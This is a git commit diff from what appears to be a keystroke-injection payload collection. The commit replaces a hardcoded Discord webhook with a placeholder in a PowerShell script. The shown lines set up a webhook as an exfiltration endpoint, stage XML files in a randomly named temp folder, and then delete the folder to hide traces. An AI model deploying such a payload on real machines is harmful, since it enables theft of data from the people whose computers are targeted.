Replaced webhook on lin 15 with placeholder

This commit is contained in:
UberGuidoZ 2023-01-20 22:32:49 -08:00 committed by GitHub
parent 5b7a46586c
commit 087c19f48a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -12,7 +12,7 @@ ALTSTRING powershell
ENTER ENTER
DELAY 2000 DELAY 2000
REM Save the Discord Webhook Endpoint in an variable. REM Save the Discord Webhook Endpoint in an variable.
ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/1065739856799617054/<Your Key>' ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/<your_webhook_info>'
ENTER ENTER
REM Creating a new folder in Temp with random name to store the xml files. REM Creating a new folder in Temp with random name to store the xml files.
ALTSTRING New-Item -Path $env:temp -Name "476F6F6420426F7921" -ItemType "directory" ALTSTRING New-Item -Path $env:temp -Name "476F6F6420426F7921" -ItemType "directory"
@ -55,4 +55,4 @@ ALTSTRING Remove-Item -Path "$env:tmp/476F6F6420426F7921" -Force -Recurse
ENTER ENTER
REM Exit powershell. REM Exit powershell.
ALTSTRING exit ALTSTRING exit
ENTER ENTER